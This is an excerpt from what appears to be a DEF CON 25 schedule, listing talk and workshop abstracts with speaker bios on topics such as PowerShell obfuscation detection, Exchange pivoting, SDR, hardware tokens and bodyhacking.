Amanda (Twitter: @malwareunicorn) absolutely loves malware. She works as a Senior Malware Researcher at Endgame who focuses on threat research focusing in dynamic behavior detection both on Windows and OSX platforms.



Return to Index      -     

 

BHV - Pisa Room - Saturday - 16:00-16:59


Title: Reversing Your Own Source Code

Speaker: Cosmo Mielke

About Cosmo Mielke:
Cosmo has a background in astronomy, but he switched to the medical field to study the metabolic syndrome that plagued him his whole life. At the Mayo Clinic he studied the molecular and genetic basis of obesity and diabetes. Currently he is working on a nonprofit citizen science movement to fight the war on obesity with crowdsourced health data. He beleives that everyone should have the right to study their own genetic "source code" without restrictions.

For his dayjob, Cosmo got super inspired by Ghost In The Shell and decided he wanted to learn how to scan his own brain, so he got a job at UCSF as one of their top data scientists in the neurology department. He scans brains for a living. Fun story.

Abstract:
In recent years, direct-to-consumer genetic testing services have given people the freedom to cheaply test their DNA. We have entered a new era where our own biological source code can be explored, allowing hackers to reverse-engineer the most complex machines in the universe: the human body. This data tells us about our ancestral origins, what makes us unique, and how our health may be influenced by our genetic predispositions.

These developments are exiting, but this new frontier is clouded by concerns about safety, privacy, and ethics. Recent developments in governmental regulation bring into question our rights as individuals to freely have our genes tested. We as hackers must unite to ensure that the human source code remains open source.

How do we embrace this technology to promote individual freedoms, accelerate research, and ultimately save lives without this information falling into wrong or abusive hands? How do we as hackers hack ourselves in a safe responsible way, and what can we expect to happen regarding government regulation? We will discuss these issues, and share our experiences as geneticists in studying our own code to better understand our health. We will also tell you about an open source science experiment we're running that will allow anyone to freely participate in genomic research for the betterment of human health and longevity.



Return to Index      -     

 

DEFCON - Track 4 - Sunday - 13:00-13:45


Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science

Sunday at 13:00 in Track 4

45 minutes | Art of Defense, Demo, Tool

Daniel Bohannon (DBO) Senior Consultant, MANDIANT

Lee Holmes Lead Security Architect, Microsoft

Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, its power has made it increasingly attractive for attackers and commodity malware authors alike. How do you separate the good from the bad?

A/V signatures applied to command line arguments work sometimes. AMSI-based (Anti-malware Scan Interface) detection performs significantly better. But obfuscation and evasion techniques like Invoke-Obfuscation can and do bypass both approaches.

Revoke-Obfuscation is a framework that transforms evasion into a treacherous deceit. By applying a suite of unique statistical analysis techniques against PowerShell scripts and their structures, what was once a cloak of invisibility is now a spotlight. It works with .evtx files, command lines, scripts, ScriptBlock logs, Module logs, and is easy to extend.

Approaches for evading these detection techniques will be discussed and demonstrated.

Revoke-Obfuscation has been used in numerous Mandiant investigations to successfully identify obfuscated and non-obfuscated malicious PowerShell scripts and commands. It also detects all obfuscation techniques in Invoke-Obfuscation, including two new techniques being released with this presentation.

Daniel Bohannon (DBO)
Daniel Bohannon is a Senior Incident Response Consultant at MANDIANT with over seven years of operations and information security experience. He is the author of the Invoke-Obfuscation and Invoke-CradleCrafter PowerShell obfuscation frameworks

@danielhbohannon

Lee Holmes
Lee Holmes is the lead security architect of Microsoft's Azure Management group, covering Azure Stack, System Center, and Operations Management Suite. He is author of the Windows PowerShell Cookbook, and an original member of the PowerShell development team.

@Lee_Holmes, http://www.leeholmes.com/blog/


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Sunday - 13:00-13:59


Title:
Robbing the network and ways to get there

1300 Sunday
Keith & Jerel "Low rent Nickerson"

Robbing the network and ways to get there

"In this presentation, we discuss the tricky scenarios we faced during internal penetration test engagements and how we have developed a tool to solve those issues.

We want to fill the gap from after cracking a password hash (normal user) from NetBIOS/LLMNR/WPAD attacks to compromising the entire Domain as well as solving a few tricky issues that we as penetration testers face.

There are also scenarios where after getting Domain Admin access doesnt mean we have access to all hosts/shares/databases on all hosts in the network. Some of the workstations/servers are in workgroup membership. Some file shares are restricted to certain groups/users in the Active Directory. These file shares might contain sensitive cardholder information or router configuration backups or Personally identifiable information (PII) data that are restricted to certain users or groups that are out of bounds to Domain Administrators.

How do we get there? It would be easy for an attacker if all hosts in the network were part of the same Domain membership and the Domain Admin group have access to all file shares in the network. However, in complex organizations, these might not be the scenarios.

The tricky part for an attacker is to find the right account to gain access and getting in and out of the environment fast.

The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources as well as an IP ranges, subnet or list of IP addresses.
The tool finds its way around the network and attempts to gain access into the hosts, finds and dumps the passwords/hashes, resuses them to compromise other hosts in the network.
"

Return to Index      -     

 

HHV - Main Contest Area, Pool Level - Friday - 13:00-15:00


Title:
Robo-Sumo

HHV was started when 1057 went around giving some robots out and sitting down with a group to assemble them. This event is open to all who want to bring (or hack together) a bot. More info here
Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 16:00-16:59


Title:
Rockin' the (vox)Vote

1600 Saturday
algorythm
@rossja
Rockin' the (vox)Vote

VoxVote is a nifty little live voting app that turns out to have terrible security. What happens when you mess with it? Let's find out...

Return to Index      -     

 

Demolabs - Table 4 - Saturday - 12:00-13:50


Ruler - Pivoting Through Exchange

Etienne Stalmans

Saturday from 1200-1350 at Table Four

Microsoft Exchange has become the defacto gateway into most organisations. By nature, Exchange needs to be externally accessible, and usually falls outside of normal security monitoring. This can allow for the bypass of common security mechanisms. Even when organisations move into the cloud, their Exchange servers still provide access into the internal environment. It has been shown in the past that abusing the rules feature of Outlook, combined with auto-synchronisation through Exchange, can allow for Remote code-execution.

Furthermore, Exchange offers a covert communication channel outside of the usual HTTP or TCP employed by most malware. Using the mailbox itself, it is possible to create a communication channel that doesn't traverse the normal network boundary, and appears to be normal Exchange behaviour when inspected on the wire.

Introducing Ruler:

During our Red Team assessments, we saw an opportunity to utilise inherent weaknesses of Microsoft Exchange and create a fully-automated tool that aided further breach of the network. Ruler allows for the easier abuse of built in functionality, including the ability to execute code on every mailbox connected to the Exchange server.

This talk will showcase the numerous features of Ruler, demonstrating how to gain a foothold, pop shells on every connected mailbox, use Exchange as a covert communication channel and maintain a near invisible persistence in the organisation. We will also discuss possible defenses against the demonstarted attacks.

https://github.com/sensepost/ruler

Etienne Stalmans


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 16:00-17:00


Title:
rustls: modern, fast, safer TLS

Author:
Joseph Birr-Pixton (Electric Imp)

Abstract:
rustls is a new open-source TLS stack written in rust. This talk covers past TLS standard and implementation errors, and how those are avoided in rustls's design.

Bio:
I'm Joe, from Cambridge, England. I've been working in crypto, computer
security and embedded development since 2005; building HSMs, mobile
authentication, and securing IoT devices.
Twitter handle of presenter(s): @jpixton
Website of presenter(s) or content: https://jbp.io

Return to Index      -     

 

Demolabs - Table 5 - Saturday - 12:00-13:50


SamyKam

Salvador Mendoza

Saturday from 1200-1350 at Table Five

Audience: Offense/Defense/Hardware

SamyKam is a new project to pentest mag-stripe information designed using the Samy Kamkar's MagSpoof as base but in this case for Raspberry Pi integration. SamyKam is a portable hardware where the user can interact with it directly on the ssh, OLED, phone or browser to test magnetic card readers or tokenization processes with prepared attacks.

https://salmg.net/2017/01/16/samykam/

Salvador Mendoza
Salvador Mendoza is a security researcher focusing in tokenization processes, mag-stripe information and embedded prototypes. He has presented on tokenization flaws and payment methods at Black Hat USA, DEF CON, DerbyCon, Ekoparty, BugCON and Troopers. Salvador designed different tools to pentest mag-stripe and tokenization processes. In his designed toolset includes MagSpoofPI, JamSpay, TokenGet and lately SamyKam.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 4 - Friday - 10:30-14:30


Scanning the Airwaves: building a cheap trunked radio/pager scanning system

Friday, 10:30 to 14:30 in Octavius 4

Richard Henderson

Bryan Passifiume

Every second of every day, radio communications are flying through the air: many cities around the world have implemented multi-million dollar trunked radio systems for their transit, municipal, public safety, police, fire and EMS radio networks. Have you ever wondered what's being said over the air? Many of these systems are easily listenable with some basic software and very inexpensive hardware dongles originally designed for capturing over-the-air television broadcasts. This workshop will walk you through the basics of trunked radio systems, how they work, and how you can set up a listening post to decode these systems and listen in. We'll also cover the legalities of listening in, and where to find information online about your local radio systems. This workshop will cover setting up and using the Trunk88 scanning software, and how to scan other conventional (non-trunked) radio systems. A free SDR USB stick will be provided to the first 35 attendees. If time permits, we will also quickly walk through scanning popular archaic pager systems like POCSAG

Prerequisites: No prerequisites required - only a desire to want to listen in on the radio systems around you, a basic understanding of radio might help, but is not essential.

Materials: Laptop with Windows installed (no guarantees a VM will work with the hardware, so set up proper dual boot on your MacBooks and Linux machines, please) Notepad, pen. The first 35 participants will be given a free SDR/DVB-T USB stick in order to participate in the practical portion of the workshop. Any attendees beyond that will need to purchase their own SDR stick at the vendor village. There should be multiple vendors selling them. No fees are required. A small capacity USB drive with all the class notes/handouts, frequency lists, and software will also be provided.

Max students: 50 | Registration: https://dc25_henderson.eventbrite.com (Sold out!)

Richard Henderson
Richard Henderson is a writer, researcher, and ham radio/electronics nerd who has worked in infosec and technology for well over a decade. Richard is currently co-authoring a book on cybersecurity for ICS/Scada systems.

Bryan Passifiume
Bryan Passifiume is a journalist, writer and photographer who covers the crime/police beat at Calgary's biggest daily newspaper. A co-founder of the alt-amateur radio group Hamsexy, he's been involved in the monitoring and radio hacking scene for nearly twenty years.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Thursday - 14:30-18:30


SDR Crash Course: Hacking your way to fun and profit

Thursday, 14:30 to 18:30 in Octavius 7

Neel Pandeya Sr. Software Engineer & Manager, Ettus Research

Nate Temple Support/Software Engineer, Ettus Research

Wireless devices and wireless systems are increasingly becoming a fundamental and integral part of our world, and are becoming more of interest to security research professionals and hobbyists alike. Software Defined Radio (SDR) is rapidly becoming the tool of choice and a necessary skill for exploring and analyzing the wireless world. There has been significant innovation and development over the past several years, and SDR hardware and software has become much more capable and accessible than at any time before.

This workshop will provide a thorough introduction to SDR and will build a solid foundation for getting started in wireless security research. We will first cover the fundamental building blocks of digital signal processing, wireless communications and SDR hardware/software. We will then walk through various hands-on interactive exercises. We will then conclude with live demonstrations of a variety of applications utilizing SDR technology.

The workshop is based on USRP hardware and GNU Radio, an open-source SDR/DSP software framework, as well as other open-source tools. Attendees do not need to pre-install anything before coming to the workshop, and will use a customized Live Linux USB image to boot from.

The workshop will consist of three sections.

In Part One, we will review the theoretical background and fundamentals of wireless communications, DSP, RF and SDR. We will then discuss in detail the software and hardware used in SDR. Next, we will provide an overview of analog and digital modulation schemes, spectrum monitoring, and the identification and analysis of signals using all open-source software.

In Part Two, attendees will be guided step-by-step in the implementation of transmitters and receivers for a variety of analog and digital wireless systems. We will then analyze, inspect and visualize real-world wireless signals such as ASK, FSK, PSK, OFDM, LTE, 802.11.

In Part Three, we will perform a live demonstration of Radio Direction Finding and a wireless Replay Attack. We will then show a demonstration of receiving and demodulating recorded GPS signals, and other satellite signals such as Outernet, APT, LRPT. We will conclude with passively detecting and identifying on-air LTE networks with SDR hardware.

Prerequisites: Attendees should have some previous experience with Linux, the Linux command line, and a programming language such as C, C++, or Python. Basic familiarity with DSP and RF fundamentals would be helpful but is not required.

Materials: Attendees should bring a laptop with at least 4 GB RAM and two USB ports, where at least one port is USB 3.0. It is recommended that you bring the most powerful laptop that you can, and in general laptops over five years old may not be suitable for the workshop. Attendees should also bring a blank USB 3.0 flash drive, with minimum capacity of 16 GB. Attendees will also be provided USRP SDR hardware to use during the workshop. Optionally, attendees are welcome to bring their own SDR hardware.

Max students: 50 | Registration: https://dc25_pandeya.eventbrite.com (Sold out!)

Neel Pandeya
Neel is a Senior Software Engineer and Manager of the Technical Support Group at Ettus Research. His background and interests are in open-source software development, Linux kernel and embedded software development, wireless and cellular communications, DSP and signal processing, and software-defined radio (SDR). He holds a Bachelor's Degree in electrical engineering (BSEE) from Worcester Polytechnic Institute (WPI), and a Master's Degree in electrical engineering (MSEE) from Northeastern University. He has an Amateur Radio License, and is aspiring to obtain a private pilot license.

Nate Temple
Nate is a Support Engineer/Software Engineer at Ettus Research working in the areas of product support and software development. His background is in Embedded Linux Development, Micro-controller Development, Web Application Development and Security. He is passionate about SDR technology and is active within the community. His general interests are programming, wireless security, amateur radio, radio direction finding, and SATCOM hunting/hacking. He has contributed to many open-source SDR software projects over the years.


Return to Index      -     

 

SEV - Emperors BR II - Friday - 17:30-18:20



Friday July 28 5:30PM 50 mins

SE vs Predator: Using Social Engineering in ways I never thought….
When I started my path down becoming a professional social engineer my vision was something like a modern day version of Sneakers.  Instead I was taken down a road that crossed paths with human traffickers, child pornography and the darkest filth on the planet.  Out of that darkness I have had the chance to do some truly remarkable things that it is time to share…..

Chris Hadnagy:  @humanhacker
Chris is a professional social engineer with over 16 years of experience.  His passion is understanding the why not just the what. Chris has had the opportunity to work with some of the world’s greatest minds in learning how to use skills that might not be too common in the infused industry.  You can find out more by looking at www.social-engineer.com


Return to Index      -     

 

DEFCON - Track 4 - Friday - 10:00-10:30


Secret Tools: Learning about Government Surveillance Software You Can't Ever See

Friday at 10:00 in Track 4

20 minutes | 0025

Peyton "Foofus" Engel Attorney at Hurley, Burish & Stanton, S.C.

Imagine that you're accused of a crime, and the basis of the accusation is a log entry generated by a piece of custom software. You might have some questions: does the software work? how accurate is it? how did it get the results that it did? Unfortunately, the software isn't available to the public. And you can't get access to the source code or even a working instance of the software. All you get are assurances that the software is in use by investigators around the globe, and doesn't do anything that law enforcement isn't supposed to be doing. Because you can trust the government, right?

This talk will look at a family of tools designed for investigating peer-to- peer networks. By synthesizing information from dozens of search warrant affidavits, and a few technical sources, we're able to put together at least a partial picture of the software's capabilities. But we'll also look at the reasons the government offers for keeping these tools out of the public eye and talk about whether they make sense. Finally, we'll examine the implications that investigations based on secret capabilities have for justice.

Peyton "Foofus" Engel
After 18 years in IT, with 16 of those years spent in security and penetration testing, Foofus now works as an attorney. But because he's got significant experience with the Internet and security, one area of his practice focuses on consulting with litigants where digital evidence is at stake. In this capacity he does forensic analysis and assists other attorneys with strategy for presenting (or calling into question) computer-based evidence. In his spare time, Foofus enjoys cooking, playing guitar, and opera. Oh, and remember CoffeeWars? Foofus was pretty involved with that


Return to Index      -     

 

DEFCON - Track 2 - Saturday - 11:00-11:45


Secure Tokin' and Doobiekeys: How to roll your own counterfeit hardware security devices

Saturday at 11:00 in Track 2

45 minutes | Demo, Tool

Joe FitzPatrick SecuringHardware.com

Michael Leibowitz Senior Trouble Maker

Let's face it, software security is still in pretty bad shape. We could tell ourselves that everything is fine, but in our hearts, we know the world is on fire. Even as hackers, it's incredibly hard to know whether your computer, phone, or secure messaging app is pwned. Of course, there's a Solution(tm) - hardware security devices.

We carry authentication tokens not only to secure our banking and corporate VPN connections, but also to access everything from cloud services to social networking. While we've isolated these 'trusted' hardware components from our potentially pwnd systems so that they might be more reliable, we will present scenarios against two popular hardware tokens where their trust can be easily undermined. After building our modified and counterfeit devices, we can use them to circumvent intended security assumptions made by their designers and users. In addition to covering technical details about our modifications and counterfeit designs, we'll explore a few attack scenarios for each.

Sharing is Caring, so after showing off a few demonstration, we'll walk you through the process of rolling your own Secure Tokin' and Doobiekey that you can pass around the circle at your next cryptoparty.

Joe FitzPatrick
Joe is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He has spent the past 5 years developing and leading hardware security related training, instructing hundreds of security researchers, pen testers, hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.

@securelyfitz

Michael Leibowitz
Michael has done hard-time in real-time. An old-school computer engineer by education, he spends his days hacking the mothership for a large semiconductor company. Previously, he developed and tested embedded hardware and software, dicked around with strap-on boot roms, mobile apps, office suites, and written some secure software. On nights and weekends he hacks on electronics, writes DEF CON CFPs, and contributes to the NSA Playset.

@r00tkillah


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 16:00-16:30


Title:
Security Analysis of the Telegram IM

Author:
Tomas Susanka (CTU Prague)

Abstract:
Telegram is a popular instant messaging service, a self-described fast and secure solution. It introduces its own home-made cryptographic protocol MTProto instead of using already known solutions, which was criticised by a significant part of the cryptographic community.

In this talk we will briefly introduce the protocol to provide context to the reader and then present two major findings we discovered as part of our security analysis performed in late 2016. First, the undocumented obfuscation method Telegram uses, and second, a replay attack vulnerability we discovered. The analysis was mainly focused on the MTProto protocol and the Telegram's official client for Android.

Bio:
Tom Sunka studied and lives in Prague and occasionaly other universities and cities because, according to him, why not. He wrote his Master's thesis on Telegram IM and amongst other things discovered an undocumented obfuscation and a possible vulnerability, which he then reported to the powers that be.

Earlier this year he graduated from FIT CTU and currently would like to move into the world of infosec. He's joining Cloudflare's crypto team for a summer internship in 2017. When he wasn't roaming the world and studying abroad he worked on a number of web applications, APIs and a Q&A mobile game. He likes to eat grapefruits before going to bed and playing chess, as unlikely a combination as it sounds.

Return to Index      -     

 

DEFCON - Track 2 - Thursday - 14:00-14:45


See no evil, hear no evil: Hacking invisibly and silently with light and sound

Thursday at 14:00 in 101 Track 2

45 minutes | Demo, Tool

Matt Wixey Senior Associate, PwC

Traditional techniques for C2 channels, exfiltration, surveillance, and exploitation are often frustrated by the growing sophistication and prevalence of security protections, monitoring solutions, and controls. Whilst all is definitely not lost, from an attacker's perspective - we constantly see examples of attackers creatively bypassing such protections - it is always beneficial to have more weapons in one's arsenal, particularly when coming up against heavily-defended networks and highly-secured environments.

This talk demonstrates a number of techniques and attacks which leverage light and/or sound, using off-the-shelf hardware. It covers everything from C2 channels and exfiltration using light and near-ultrasonic sound, to disabling and disrupting motion detectors; from laser microphones, to repelling drones; from trolling friends, to jamming speech and demotivating malware analysts.

This talk not only provides attendees with a new suite of techniques and methodologies to consider when coming up against a well-defended target, but also demonstrates, in a hopefully fun and practical way, how these techniques work, their advantages, disadvantages, and possible future developments. It also gives details of real case studies where some of these techniques have been used, and provides defenders with realistic methods for the mitigation of these attacks.

Finally, the talk covers some ideas for future research in this area.

Matt Wixey
Matt Wixey is a penetration tester on PwC's Threat and Vulnerability Management team in the UK, and leads the team's research function. Prior to joining PwC, he led a technical R&D team in a UK law enforcement agency. His research interests include bypassing air-gaps, antivirus and sandbox technologies, and RF hacking.

@darkartlab


Return to Index      -     

 

BHV - Pisa Room - Friday - 14:00-14:29


Title: Sensory Augmentation 101

Speaker: Trevor Goodman

About Trevor Goodman:
Trevor Goodman is a bodyhacker and the Event Director for BDYHAX, the BodyHacking Convention. They are working to grow the bodyhacking and biohacking industries and communities in the US, Canada and Europe. Trevor is also the Event Director for InfoSec Southwest in Austin, TX and Director of Rogue Signal.